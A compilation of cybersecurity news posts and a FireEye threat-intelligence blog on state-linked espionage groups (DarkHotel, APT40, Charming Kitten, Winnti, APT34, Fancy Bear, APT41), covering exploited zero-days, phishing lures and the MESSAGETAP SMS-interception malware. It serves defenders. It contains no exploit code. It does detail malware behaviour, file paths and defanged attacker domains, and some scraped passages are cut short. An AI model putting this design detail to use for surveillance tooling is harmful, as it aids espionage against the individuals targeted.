“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the advisory published by Microsoft. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

An attacker could exploit the flaw to can gain the same user permissions as the user logged into the compromised Windows device. If the user is logged on with administrative permissions, the attacker can exploit the flaw to take full control of the system.

The CVE-2020-0674 flaw could be triggered by tricking victims into visiting a website hosting a specially crafted content designed to exploit the issue through Internet Explorer.

Microsoft announced that it was working on a patch to address the issue, meantime it suggested restricting access to JScript.dll using the following workaround to mitigate this zero-day flaw.

The flaw was reported by Google’s Threat Analysis Group and Chinese cybersecurity firm Qihoo 360, the latter security company confirmed that the DarkHotel group is the threat actor that exploited the issue in attacks in the wild.

The first Darkhotel espionage campaign was spotted by experts at Kaspersky Lab in late 2014, according to the researchers the APT group has been around for nearly a decade while targeting selected corporate executives traveling abroad. According to the

According to the experts, threat actors behind the Darkhotel campaign aimed to steal sensitive data from executives while they are staying in luxury hotels, the worrying news is that the hacking crew is still active.

The attackers appeared high skilled professionals that exfiltrated data of interest with a surgical precision and deleting any trace of their activity. The researchers noticed that the gang never go after the same target twice. The list of targets includes  CEOs, senior vice presidents, top R&D engineers, sales and marketing directors from the USA and Asia traveling for business in the APAC region.

Security researchers believe the APT group is a North Korea-linked nation-state actor.

12 of the total vulnerabilities fixed by Microsoft this month are rated as critical in severity, and the remaining ones have been rated as important.

Microsoft Patch Tuesday updates for February 2020 also address four important-severity vulnerabilities, two privilege escalation flaws in Windows, an information disclosure bug affecting IE and Edge, and a secure boot bypass method. All four flaws have been publicly disclosed before the company addressed them.

Ad usual let me suggest to give a look at the analysis of the security updates made by Trend Micro’s Zero Day Initiative (ZDI).

Pierluigi Paganini

(SecurityAffairs – Patch Tuesday updates for February 2020 , hacking)

The post Microsoft Patch Tuesday updates for February 2020 fix IE 0day flaw appeared first on Security Affairs.

Malaysia’s MyCERT warns cyber espionage campaign carried out by APT40

Malaysia’s MyCERT issued a security alert to warn of a hacking campaign targeting government officials that was carried out by the China-linked APT40 group.

Malaysia’s Computer Emergency Response Team (MyCERT) warns of a cyber espionage campaign carried out by the China-linked APT40 group aimed at Malaysian government officials.

The attackers aimed at stealing confidential documents from government systems after having infected them with malware.

MyCERT observed an increase in number of artifacts and victims involving a campaign against Malaysian Government officials by a specific threat group.” reads the alert issued by MyCERT. “The group motives is believe to be  data theft and exfiltration.”

The attackers used spear-phishing messages sent to government officials, they posed as a journalist, an individual from a trade publication, or individuals from a relevant military organization or non-governmental organization (NGO).

The messages contained links to weaponized Office documents stored on Google Drive. Once the documents are opened and the victims have enabled the macros, the dropper is executed.

The attackers exploit the CVE-2014-6352 and CVE-2017-0199 Office vulnerabilities to drop and execute the malware on the victim’s computer.

“The group’s operations tend to target government-sponsored projects and take large amounts of information specific to such projects, including proposals, meetings, financial data, shipping information, plans and drawings, and raw data,” continues MyCERT.

It is not clear if the attackers have exfiltrated sensitive documents from government officials.

The advisory doesn’t explicitly attribute the campaign to the Chinese APT, but references included in the alert point to the APT40 hacking group.

The cyber-espionage group tracked as APT40 (aka TEMP.PeriscopeTEMP.Jumper, and Leviathan), apparently linked to the Chinese government, is focused on targeting countries important to the country’s Belt and Road Initiative (i.e. Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom).


Experts believe that APT40 is a state-sponsored Chinese APT group due to its alignment with Chinese state interests and technical artifacts suggesting the actor is based in China.

The APT40 group has been active since at least 2013 and appears to be focused on supporting naval modernization efforts of the Government of Beijing. Threat actors target engineering, transportation, and defense sectors, experts observed a specific interest in maritime technologies.

The cyberspies also targeted research centres and universities involved in naval research with the intent to access advanced technology to push the growth of the Chinese naval industry.

The list of victims of the APT40 group also includes organizations with operations in Southeast Asia or involved in South China Sea disputes.

In January, a group of anonymous security researchers that calls itself Intrusion Truth has discovered that the APT40 uses 13 front companies operating in the island of Hainan to recruit hackers.

Intrusion Truth did not associate the group from Hainan with a specific Chinese APT group, but FireEye and Kaspersky researchers believe that the China-linked group is the APT40 (aka TEMP.PeriscopeTEMP.Jumper, and Leviathan).

Pierluigi Paganini

(SecurityAffairs – APT40, China)

The post Malaysia’s MyCERT warns cyber espionage campaign carried out by APT40 appeared first on Security Affairs.

Iran-linked APT group Charming Kitten targets journalists, political and human rights activists

Iran-linked APT group Charming Kitten has been targeting journalists, political and human rights activists in a new campaign.

Researchers from Certfa Lab reports have spotted a new cyber espionage campaign carried out by Iran-linked APT group Charming Kitten that has been targeting journalists, political and human rights activists.

Iran-linked Charming Kitten group, (aka APT35PhosphorusNewscaster, and Ajax Security Team) made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Microsoft has been tracking the threat actors at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011 targeting journalists and activists in the Middle East, as well as organizations in the United States, and entities in the U.K., Israel, Iraq, and Saudi Arabia.

The campaign uncovered by Certfa Lab is related to previously observed targeted attacks against a U.S. candidate, government officials, and expatriate Iranians.

Certfa Lab has identified a new series of phishing attacks from the Charming Kitten1, the Iranian hacking group who has a close relationship with Iran’s state and Intelligence services. According to our investigation, these new attacks have targeted journalists, political and human rights activists.” reads the post published by Certfa Lab. “These phishing attacks are in line with the previous activities of the group that companies like ClearSky2 and Microsoft3 have reported in detail in September and October 2019.”

The Iranian hackers are still focusing to target private and government institutions, think tanks and academic institutions, organizations with ties to the Baha’i community, and many others in European countries, the United States, United Kingdom, and Saudi Arabia.

The attackers created a fake account impersonating New York Times journalist Farnaz Fassihi (former Wall Street Journal (WSJ) journalist) to send fake interview proposals or invitations to a webinar to the target individuals and trick them into accessing phishing websites. 

The spear-phishing messages use links in the footnotes, including social media links, WSJ and Dow Jones websites, that are all in the short URL format. When the victims click on them, they are redirected to legitimate addresses while getting basic information about the victim’s device (i.e. IP address, Operating System, and browser) that could be used to prepare the attack against the victim’s devices.

Then, the attackers send a link to a page containing interview questions that is hosted on Google Sites, a common trick to evade detection.

Once the victims clicked the download button on the Google Site page, they will be redirected to another fake page in two-step-checkup[.]site domain where login credential details of his/her email such as the password and two factor authentication (2FA) code are requested.

Charming Kitten phishing 2.png

Attackers employed a backdoor named “pdfreader.exe,” it was first uploaded to VirusTotal by an anonymous user on 3 October 2019. The malware gathers victim device data and achieves persistence through modified Windows Firewall and Registry settings. Experts pointed out that the malware is linked to operators behind past Charming Kitten campaigns

“The similarities between the method of managing and sending HTTP requests in “two-step-checkup[.]site” server with the latest techniques used by this group is further evidence of Charming Kitten’s connection to these attacks.” continues the report.”In this technique, if sent requests to the host server of the phishing kit are denied, the user is directed to a legitimate website like Google, Yahoo!, or Outlook by “301 Moved Permanently” and “Found redirect 302” responses. As a result, this method makes it harder for different pages and sections of phishing websites to be exposed to the public.”

The recently discovered phishing attacks by the Charming Kitten are in line with previous activities conducted by the group. Certfa speculates that the APT group is working on the development of a series of malware for their future phishing attack campaign.

“The Charming Kitten used Google Sites for their phishing attack, and Certfa believes that they work on the development of a series of malware for their future phishing attack campaign.” concludes the report.

Pierluigi Paganini

(SecurityAffairs – Charming Kitten, APT)

The post Iran-linked APT group Charming Kitten targets journalists, political and human rights activists appeared first on Security Affairs.

Gamaredon APT Improves Toolset to Target Ukraine Government, Military

The Gamaredon advanced persistent threat (APT) group has been supercharging its operations lately, improving its toolset and ramping up attacks on Ukrainian national security targets. Vitali Kremez, head of SentinelLabs, said in research released on Wednesday that he has been tracking an uptick in Gamaredon cyberattacks on Ukrainian military and security institutions that started in […]

Winnti APT Group targeted Hong Kong Universities

Winnti Group has compromised computer systems at two Hong Kong universities during the Hong Kong protests that started in March 2019.

Hackers from the China-linked Winnti group have compromised computer systems at two Hong Kong universities during the Hong Kong protests that started in March 2019.

Researchers from ESET discovered the attacks in November 2019 when they spotted the ShadowPad launcher malware samples on multiple devices at the two universities. The launchers were discovered two weeks after Winnti malware infections were detected in October 2019.

“In November 2019, we discovered a new campaign run by the Winnti Group against two Hong Kong universities. We found a new variant of the ShadowPad backdoor, the group’s flagship backdoor, deployed using a new launcher and embedding numerous modules.” reads the analysis published by ESET. “The Winnti malware was also found at these universities a few weeks prior to ShadowPad.”

The Winnti group was first spotted by Kaspersky in 2013, but according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEADPassCV, Wicked Panda, and ShadowPad.

Experts discovered samples from both ShadowPad and Winnti at the universities that were containing campaign identifiers and C&C URLs with the names of the universities, a circumstance that indicates a highly targeted attack.

“One can observe that the C&C URL used by both Winnti and ShadowPad complies to the scheme [backdoor_type][target_name].domain.tld:443 where [backdoor_type] is a single letter which is either “w” in the case of the Winnti malware or “b” in the case of ShadowPad.” continues the report.

“From this format, we were able to find several C&C URLs, including three additional Hong Kong universities’ names. The campaign identifiers found in the samples we’ve analyzed match the subdomain part of the C&C server, showing that these samples were really targeted against these universities.”

One can observe that the C&C URL used by both Winnti and ShadowPad complies to the scheme [backdoor_type][target_name].domain.tld:443 where [backdoor_type] is a single letter which is either “w” in the case of the Winnti malware or “b” in the case of ShadowPad.

Analyzing the C&C URL format experts determined that hackers targeted three additional Hong Kong universities. 

The ShadowPad multi-modular backdoor employed in the attacks against the Hong Kong universities was referencing 17 modules focused on info-stealing that were used to collect information from infected systems.

“In contrast, the variants we described in our white paper didn’t even have that module embedded.” continues the report.

Winnti shadowPad

Unlike previous variants of the ShadowPad backdoor detailed in ESET white paper on the arsenal of the Winnti Group, this launcher is not obfuscated using VMProtect, instead it used XOR-encryption rather than the typical RC5 key block encryption algorithm.

Other technical details are reported in the ESET’s analysis, including Indicators of Compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post Winnti APT Group targeted Hong Kong Universities appeared first on Security Affairs.

Iran-linked APT34 group is targeting US federal workers

Iran-linked APT34 group has targeted a U.S.-based research company that provides services to businesses and government organizations.

Security experts from Intezer observed targeted attacks on a US-based research company that provides services to businesses and government organizations.

“Our researchers Paul Litvak and Michael Kajilolti have discovered a new campaign conducted by APT34 employing an updated toolset. Based on uncovered phishing documents, we believe this Iranian actor is targeting Westat employees, or United States organizations hiring Westat services.” reads the analysis published by Intezer.

The experts believe that the attacker was launched by the cyber-espionage group APT34 (aka OilRig or Helix Kitten). APT34 is an Iran-linked APT group that has been around since at least 2014, it mainly targeted organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.

The recent campaign appears similar to the one observed by FireEye in July 2019 when hackers were posing as a researcher from Cambridge to infect victims with three new malware.

According to Intezer, the attackers used a phishing document masquerading as an employee satisfaction survey for employees at the US government contractor Westat.

The survey distributed via email as Excel spreadsheets. Once the macros inside the were enabled, the malicious code downloaded and installed the TONEDEAF backdoor and the VALUEVAULT password stealer.

“The embedded VBA code unpacks a zip file into a temporary folder, extracts a “Client update.exe” executable file and installs it to “C:Users<User>valsClient update.exe”.” continues the analysis.

“Client update.exe” is actually a highly modified version of the TONEDEAF malware, which we named TONEDEAF 2.0. Finally, the crtt function creates a scheduled task “CheckUpdate” that runs the unpacked executable five minutes after being infected by it, as well as on future log-ons.”

Both malware used in this campaign (tracked as TONEDEAF 2.0 and VALUEVAULT 2.0) were also employed in the campaign observed in July 2019, but they include major updates that changes were developed for this specific attack.

The C2 domain (manygoodnews[.]com) is still active and was created 4 months ago, experts added that a certificate was issued for the website just a month ago, a circumstance that suggests the campaign is still ongoing.

The TONEDEAF backdoor communicates with its C&C via HTTP, but version 2.0 uses a revamped communication protocol. The new variant of the malware only implements shell execution capabilities.

TONEDEAF 2.0 was improved to evade detection and implements dynamic importing, string decoding, and a new technique to deceive its victims into believing it is a legitimate, broken app.

TONEDEAF 2.0 used HTTP for C2 communication, but experts noticed it is using a custom encoding and handshake mechanisms.

The experts believe that attackers also employed VALUEVAULT implant in this campaign, they noticed that a user from Lebanon uploaded to VirusTotal versions of the bait document leading to VALUEVAULT and TONEDEAF 2.0.

“This VALUEVAULT takes a more minimalistic approach than its predecessor. Many functionalities and strings were stripped from the new binary in order to lower its noise. Only Chrome password dumping is now supported, although interestingly the use of the file “fsociety.dat” as a password data store under the “AppData\Roaming” directory stayed the same.” states the experts.

Another evidence collected by the researchers is that the document author’s version of Microsoft Excel has Arabic installed as the preferred language.

“The technical analysis of the new malware variants shows the group has been investing substantial effort in upgrading their tools in an attempt to stay undetected after being exposed, and it seems that effort is generally off,” concludes Intezer.

Pierluigi Paganini

(SecurityAffairs – APT34, hacking)

The post Iran-linked APT34 group is targeting US federal workers appeared first on Security Affairs.

How to prioritize IT security projects

If you’re an IT security professional, you’re almost certainly familiar with that sinking feeling you experience when presented with an overwhelming number of security issues to remediate. It’s enough to make you throw your hands up and wonder where to even begin. This is the crux of the problem that develops in the absence of effective security prioritization. If you aren’t prioritizing cybersecurity risks effectively, you’re not only creating a lot of extra work for … More

The post How to prioritize IT security projects appeared first on Help Net Security.

Chinese hackers exploited a Trend Micro antivirus zero-day used in Mitsubishi Electric hack

Chinese hackers have exploited a zero-day vulnerability the Trend Micro OfficeScan antivirus in the recently disclosed hack of Mitsubishi Electric.

According to ZDNet, the hackers involved in the attack against the Mitsubishi Electric have exploited a zero-day vulnerability in Trend Micro OfficeScan to infect company servers.

This week, Mitsubishi Electric disclosed a security breach that might have exposed personal and confidential corporate data. According to the company, attackers did not obtain sensitive information about defense contracts.

The breach was detected almost eight months ago, on June 28, 2019, with the delay being attributed to the increased complexity of the investigation caused by the attackers deleting activity logs.

“On June 28, last year, a suspicious behavior was detected and investigated on a terminal in our company, and as a result of unauthorized access by a third party, data was transmitted to the outside,” reads a data breach notification published by the company.

The intrusion took place on June 28, 2019, and the company launched an investigation in September 2019. Mitsubishi Electric disclosed the security incident only after two local newspapers, the Asahi Shimbun and Nikkei, reported the security breach.

Mitsubishi Electric had also already notified members of the Japanese government and Ministry of Defense.

The two media outlets attribute the cyber attack to a China-linked cyber espionage group tracked as Tick (aka Bronze Butler).

The hacker group has been targeting Japanese heavy industry, manufacturing and international relations at least since 2012,

According to the experts, the group is linked to the People’s Republic of China and is focused on exfiltrating confidential data.

“According to people involved, Chinese hackers Tick may have been involved. According to Mitsubishi Electric, “logs (to check for leaks) have been deleted and it is not possible to confirm whether or not they actually leaked.” reported the Nikkei.

“According to the company, at least tens of PCs and servers in Japan and overseas have been found to have been compromised. The amount of unauthorized access is approximately 200 megabytes, mainly for documents.”

The security breach was discovered after Mitsubishi Electric staff found a suspicious file on one of the company’s servers, further investigation allowed the company to determine that hack of an employee account.

According to the media, hackers gained access to the networks of around 14 company departments, including sales and the head administrative office. Threat actors stole around 200 MB of files including:

  • Personal information and recruitment applicant information (1,987) 
  • New graduate recruitment applicants who joined the company from October 2017 to April 2020, and experienced recruitment applicants from 2011 to 2016 and our employee information (4,566) 
  • 2012 Survey results regarding the personnel treatment system implemented for employees in the headquarters in Japan, and information on retired employees of our affiliated companies (1,569) 

Now ZDNet has learned from sources close to the investigation that the Chinese hackers have used a zero-day flaw in the Trend Micro OfficeScan antivirus in the attack on Mitsubishi Electric.

The attackers have exploited a directory traversal and arbitrary file upload vulnerability, tracked as CVE-2019-18187, in the Trend Micro OfficeScan antivirus.

Trend Micro has now addressed the vulnerability, but we cannot exclude that the hackers have exploited the same issue in attacks against other targets. After the security firm patched the CVE-2019-18187 flaw in October, it warned customers that the issue was being actively exploited by hackers in the wild.

“Trend Micro has released Critical Patches (CP) for Trend Micro OfficeScan 11.0 SP1 and XG which resolve an arbitrary file upload with directory traversal vulnerability.” reads the security advisory published by Trend Micro in October 2019.

“Affected versions of OfficeScan could be exploited by an attacker utilizing a directory traversal vulnerability to extract files from an arbitrary zip file to a specific folder on the OfficeScan server, which could potentially lead to remote code execution (RCE). The remote process execution is bound to a web service account, which depending on the web platform used may have restricted permissions. An attempted attack requires user authentication.”

The issue affects OfficeScan versions XG SP1, XG (Non-SP GM build), 11.0 SP1 for Windows.

“In a case study on its website, Trend Micro lists Mitsubishi Electric as one of the companies that run the OfficeScan suite.” reported ZDNet.

Pierluigi Paganini

(SecurityAffairs – Mitsubishi Electric, hacking)

The post Chinese hackers exploited a Trend Micro antivirus zero-day used in Mitsubishi Electric hack appeared first on Security Affairs.

Iran-Linked PupyRAT backdoor used in recent attacks on European energy sector

Hackers used a remote access Trojan (RAT) associated with Iran-linked APT groups in recent attacks on a key organization in the European energy sector.

Security experts from Recorded Future reported that a backdoor previously used in attacks carried out by an Iran-linked threat actor was used to target a key organization in the European energy sector.

The malware is the PupyRAT backdoor, it is a “multi-platform (Windows, Linux, OSX, Android), multi-function RAT and post-exploitation tool mainly written in Python” that can give the attackers full access to the victim’s system.

The PupyRAT backdoor is an open-source piece of malware available on GitHub, it was used in past campaigns associated with the Iran-linked APT groups like APT33 (also known as Elfin, Magic Hound and HOLMIUM), COBALT GYPSY, and APT34 (aka OilRIG).

The above groups were involved in past attacks on organizations in the energy sector worldwide.

Now experts from Recorded Future identified malicious traffic between PupyRAT install and the command and control (C&C) server identified by the experts. The communication involved a mail server for a European energy sector organization and took place between November 2019 and at least January 5, 2020.

“Using Recorded Future remote access trojan (RAT) controller detections and network traffic analysis techniques, Insikt Group identified a PupyRAT command and control (C2) server communicating with a mail server for a European energy sector organization from late November 2019 until at least January 5, 2020.” reads the analysis published by Recorded Future. “While metadata alone does not confirm a compromise, we assess that the high volume and repeated communications from the targeted mail server to a PupyRAT C2 are sufficient to indicate a likely intrusion.”

The researchers were not able to attribute the attack to Iran-linked APT groups, anyway, their analysis highlights that the targeted organization had a role in the coordination of European energy resources.

The activity predated the recent escalation of kinetic activity between the U.S. and Iran.

Experts suggest to monitor for sequential login attempts from the same IP against different accounts, use a password manager and set strong, unique passwords and of course adopt multi-factor authentication. Recorded Future researchers also recommend that organizations analyze and cross-reference log data to detect high-frequency lockouts, unsanctioned remote access attempts, temporal attack overlaps across multiple user accounts, and fingerprint unique web browser agent information.

“Although this commodity RAT, PupyRAT, is known to have been used by Iranian threat actor groups APT33 and COBALT GYPSY, we cannot confirm whether the PupyRAT controller we identified is used by either Iranian group.” concludes the report. “Whoever the attacker is, the targeting of a mail server at a high-value critical infrastructure organization could give an adversary access to sensitive information on energy allocation and resourcing in Europe.”

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Iran-Linked PupyRAT backdoor used in recent attacks on European energy sector appeared first on Security Affairs.

Why Russian APT Fancy Bear hacked the Ukrainian energy firm Burisma?

Russia-linked cyber-espionage group hacked the Ukrainian energy company Burisma at the center of the impeachment trial of US President Donald Trump.

The Russian cyberspies, operating under Russia’s GRU military intelligence agency (aka Fancy Bear) carried out a spear-phishing campaign in November aimed at accessing the email of Burisma Holdings employees.

The attack was detailed by California-based cybersecurity firm Area 1 Security in a report.

“This report details an ongoing Russian government phishing campaign targeting the email credentials of employees at Burisma Holdings and its subsidiaries and partners. The campaign against the Ukranian oil & gas company was launched by the Main Intelligence Directorate of the General Staff of the Russian Army or GRU.” reads the report published by Area 1 Security. “Phishing for credentials allows cyber actors to gain control of an organization’s internal systems by utilizing trusted access methods (e.g.: valid usernames and passwords) in order to observe or to take further action. Once credentials are phished, attackers are able to operate covertly within an organization in pursuit of their goal.”

In December President Trump was facing an impeachment trial over his efforts to pressure Ukraine to investigate former Vice President Joseph R. and its relationship with the former board member Hunter Biden, the son of Joe Biden.

Russian military cyberspies were gathering information by hacking the Ukrainian gas company.

“The timing of the GRU’s campaign in relation to the 2020 US elections raises the specter that this is an early warning of what we have anticipated since the successful cyberattacks undertaken during the 2016 US elections,” continues the Area 1 report.

It is not clear which information the hackers have accessed, experts believe Russian spies were searching for potentially embarrassing material on the rival Biden and his son.

In July 2019, a phone call from Trump to Ukrainian President Volodymyr Zelensky was asking him to investigate the Bidens and Burisma.

Burisma hired the Biden’s son while his father was vice president and leading the Obama administration’s Ukraine policy.

“Donald Trump tried to coerce Ukraine into lying about Joe Biden and a major bipartisan, international anti-corruption victory because he recognized that he can’t beat the vice president,” said Andrew Bates, a spokesman for the Biden campaign.” states the NYT.

“Now we know that Vladimir Putin also sees Joe Biden as a threat,” Mr. Bates added. “Any American president who had not repeatedly encouraged foreign interventions of this kind would immediately condemn this attack on the sovereignty of our elections.”

The scheme was similar to the one allegedly adopted by Russian intelligence ahead of the Presidential election in 2016, when the cyberspies hackerd emails from Hillary Clinton’s campaign and used an army of trolls to spread propaganda and misinformation.

According to Area 1’s report, the GRU spies hacked the servers of Burisma Holdings.

In this campaign, the GRU combined several different authenticity techniques to compromise the targeted network, such as Domain-based authenticity, Business process and application authenticity, and Partner and supply chain authenticity.

“Since 2016, the GRU has consistently used an assembly line process to acquire and set up infrastructure for their phishing campaigns. Area 1 Security has correlated this campaign against Burisma Holdings with specific tactics, techniques, and procedures (TTPs) used exclusively by the GRU in phishing for credentials.” continues the report.”Repeatedly, the GRU uses Ititch, NameSilo, and NameCheap for domain registration; MivoCloud and M247 as Internet Service Providers; Yandex for MX record assignment; and a consistent pattern of lookalike domains.”

Trump is expected to stand trial in the Senate as early as this week on two articles of impeachment abuse of power and obstruction of Congress.

Pierluigi Paganini

(SecurityAffairs – Bronze President, hacking)

The post Why Russian APT Fancy Bear hacked the Ukrainian energy firm Burisma? appeared first on Security Affairs.

China-linked APT40 group hides behind 13 front companies

A group of anonymous security researchers that calls itself Intrusion Truth have tracked the activity of a China-linked cyberespionage group dubbed APT40.

A group of anonymous security researchers that calls itself Intrusion Truth has discovered that a China-linked cyberespionage group, tracked as APT40, uses 13 front companies operating in the island of Hainan to recruit hackers.

The Intrusion Truth group has doxed the fourth Chinese state-sponsored hacking operation.

“We know that multiple areas of China each have their own APT.” reads the report.

“After a long investigation we now know that it is possible to take a province and identify front companies, from those companies identify individuals who work there, and then connect these companies and individuals to an APT and the State.”

The Intrusion Truth group has already other APT groups operating in other provinces of the country, including APT3 (from the Guangdong province), APT10 (from Tianjin province), and APT17 (Jinan province). The last group tracked by the researcher is now operating out of the Hainan province, an island in the South China Sea.

Intrusion Truth did not associate the group from Hainan with a specific Chinese APT group, but FireEye and Kaspersky researchers believe that the China-linked group is the APT40 (aka TEMP.PeriscopeTEMP.Jumper, and Leviathan).

The cyber-espionage group tracked as APT40 (aka TEMP.PeriscopeTEMP.Jumper, and Leviathan), apparently linked to the Chinese government, is focused on targeting countries important to the country’s Belt and Road Initiative (i.e. Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom).


Experts believe that APT40 is a state-sponsored Chinese APT group due to its alignment with Chinese state interests and technical artifacts suggesting the actor is based in China.

The APT40 group has been active since at least 2013 and appears to be focused on supporting naval modernization efforts of the Government of Beijing. Threat actors target engineering, transportation, and defense sectors, experts observed a specific interest in maritime technologies.

The cyberspies also targeted research centres and universities involved in naval research with the intent to access advanced technology to push the growth of the Chinese naval industry.

The list of victims of the APT40 group also includes organizations with operations in Southeast Asia or involved in South China Sea disputes.

The 13 companies identified by the Intrusion Truth have similar characteristics, like the lack of an online presence, and experts noticed overlapping of contact details and share office locations. The companies were all involved in the recruiting of hackers with offensive security skills.

“Looking beyond the linked contact details though, some of the skills that these adverts are seeking are on the aggressive end of the spectrum,” reads the post published by Intrusion Truth.

“While the companies stress that they are committed to information security and cyber-defence, the technical job adverts that they have placed seek skills that would more likely be suitable for red teaming and conducting cyber-attacks,” they go on to say.

According to the experts, a professor in the Information Security Department at the Hainan University was tasked with recruiting for the 13 companies.

One of the above companies was headquartered in the University’s library, and the professor was also a former member of China’s military.

“Following further analysis, we noticed a close association between these Hainan front companies and the academic world. Multiple job adverts for the companies are posted on university websites. Hainan Xiandun even appears to operate from the Hainan University Library!” continues the post. “Gu Jian, a Professor in the Information Security Department and former member of the PLA is now the contact person for an APT front company which itself is linked to twelve other front companies.”

Technical details of the analysis are included in the report published by the experts.

Pierluigi Paganini

(SecurityAffairs – Intrusion Truth, APT40)

The post China-linked APT40 group hides behind 13 front companies appeared first on Security Affairs.

MESSAGETAP: Who’s Reading Your Text Messages?

FireEye Mandiant recently discovered a new malware family used by APT41 (a Chinese APT group) that is designed to monitor and save SMS traffic from specific phone numbers, IMSI numbers and keywords for subsequent theft. Named MESSAGETAP, the tool was deployed by APT41 in a telecommunications network provider in support of Chinese espionage efforts. APT41’s operations have included state-sponsored cyber espionage missions as well as financially-motivated intrusions. These operations have spanned from as early as 2012 to the present day. For an overview of APT41, see our August 2019 blog post or our full published report. MESSAGETAP was first reported to FireEye Threat Intelligence subscribers in August 2019 and initially discussed publicly in an APT41 presentation at FireEye Cyber Defense Summit 2019.


APT41's newest espionage tool, MESSAGETAP, was discovered during a 2019 investigation at a telecommunications network provider within a cluster of Linux servers. Specifically, these Linux servers operated as Short Message Service Center (SMSC) servers. In mobile networks, SMSCs are responsible for routing Short Message Service (SMS) messages to an intended recipient or storing them until the recipient has come online. With this background, let's dig more into the malware itself.

MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. Once installed, the malware checks for the existence of two files: keyword_parm.txt and parm.txt and attempts to read the configuration files every 30 seconds.  If either exist, the contents are read and XOR decoded with the string:

    • Interestingly, this XOR key leads to a URL owned by the European Telecommunications Standards Institute (ETSI). The document explains the Short Message Service (SMS) for GSM and UMTS Networks. It describes architecture as well as requirements and protocols for SMS.

These two files, keyword_parm.txt and parm.txt contain instructions for MESSAGETAP to target and save contents of SMS messages.

  • The first file (parm.txt) is a file containing two lists:
    • imsiMap: This list contains International Mobile Subscriber Identity (IMSI) numbers. IMSI numbers identify subscribers on a cellular network.
    • phoneMap: The phoneMap list contains phone numbers.
  • The second file (keyword_parm.txt) is a list of keywords that is read into keywordVec.

Both files are deleted from disk once the configuration files are read and loaded into memory. After loading the keyword and phone data files, MESSAGETAP begins monitoring all network connections to and from the server. It uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP. Finally, the malware parses and extracts SMS message data from the network traffic:

  1. SMS message contents
  2. The IMSI number
  3. The source and destination phone numbers

The malware searches the SMS message contents for keywords from the keywordVec list, compares the IMSI number with numbers from the imsiMap list, and checks the extracted phone numbers with the numbers in the phoneMap list.

Figure 1: General Overview Diagram of MESSAGETAP

If the SMS message text contains one of the keywordVec values, the contents are XORed and saved to a path with the following format:

  • /etc/<redacted>/kw_<year><month><day>.csv

The malware compares the IMSI number and phone numbers with the values from the imsiMap and phoneMap lists. If found, the malware XORs the contents and stores the data in a path with the following format:

  • /etc/<redacted>/<year><month><day>.csv

If the malware fails to parse a message correctly, it dumps it to the following location:

  • /etc/<redacted>/<year><month><day>_<count>.dump

Significance of Input Files

The configuration files provide context into the targets of this information gathering and monitoring campaign. The data in keyword_parm.txt contained terms of geopolitical interest to Chinese intelligence collection. The two lists phoneMap and imsiMap from parm.txt contained a high volume of phone numbers and IMSI numbers.

For a quick review, IMSI numbers are used in both GSM (Global System for Mobiles) and UMTS (Universal Mobile Telecommunications System) mobile phone networks and consists of three parts:

  1. Mobile Country Code (MCC)
  2. Mobile Network Code (MNC)
  3. Mobile Station Identification Number (MSIN)

The Mobile Country Code corresponds to the subscriber’s country, the Mobile Network Code corresponds to the specific provider and the Mobile Station Identification Number is uniquely tied to a specific subscriber.

Figure 2: IMSI number description

The inclusion of both phone and IMSI numbers show the highly targeted nature of this cyber intrusion. If an SMS message contained either a phone number or an IMSI number that matched the predefined list, it was saved to a CSV file for later theft by the threat actor.

Similarly, the keyword list contained items of geopolitical interest for Chinese intelligence collection. Sanitized examples include the names of political leaders, military and intelligence organizations and political movements at odds with the Chinese government. If any SMS messages contained these keywords, MESSAGETAP would save the SMS message to a CSV file for later theft by the threat actor.

In addition to MESSAGETAP SMS theft, FireEye Mandiant also identified the threat actor interacting with call detail record (CDR) databases to query, save and steal records during this same intrusion. The CDR records corresponded to foreign high-ranking individuals of interest to the Chinese intelligence services. Targeting CDR information provides a high-level overview of phone calls between individuals, including time, duration, and phone numbers. In contrast, MESSAGETAP captures the contents of specific text messages.

Looking Ahead

The use of MESSAGETAP and targeting of sensitive text messages and call detail records at scale is representative of the evolving nature of Chinese cyber espionage campaigns observed by FireEye. APT41 and multiple other threat groups attributed to Chinese state-sponsored actors have increased their targeting of upstream data entities since 2017. These organizations, located multiple layers above end-users, occupy critical information junctures in which data from multitudes of sources converge into single or concentrated nodes. Strategic access into these organizations, such as telecommunication providers, enables the Chinese intelligence services an ability to obtain sensitive data at scale for a wide range of priority intelligence requirements.

In 2019, FireEye observed four telecommunication organizations targeted by APT41 actors. Further, four additional telecommunications entities were targeted in 2019 by separate threat groups with suspected Chinese state-sponsored associations. Beyond telecommunication organizations, other client verticals that possess sensitive records related to specific individuals of interest, such as major travel services and healthcare providers, were also targeted by APT41. This is reflective of an evolving Chinese targeting trend focused on both upstream data and targeted surveillance. For deeper analysis regarding recent Chinese cyber espionage targeting trends, customers may refer to the FireEye Threat Intelligence Portal. This topic was also briefed at FireEye Cyber Defense Summit 2019.

FireEye assesses this trend will continue in the future. Accordingly, both users and organizations must consider the risk of unencrypted data being intercepted several layers upstream in their cellular communication chain. This is especially critical for highly targeted individuals such as dissidents, journalists and officials that handle highly sensitive information. Appropriate safeguards such as utilizing a communication program that enforces end-to-end encryption can mitigate a degree of this risk. Additionally, user education must impart the risks of transmitting sensitive data over SMS. More broadly, the threat to organizations that operate at critical information junctures will only increase as the incentives for determined nation-state actors to obtain data that directly support key geopolitical interests remains.

FireEye Detections

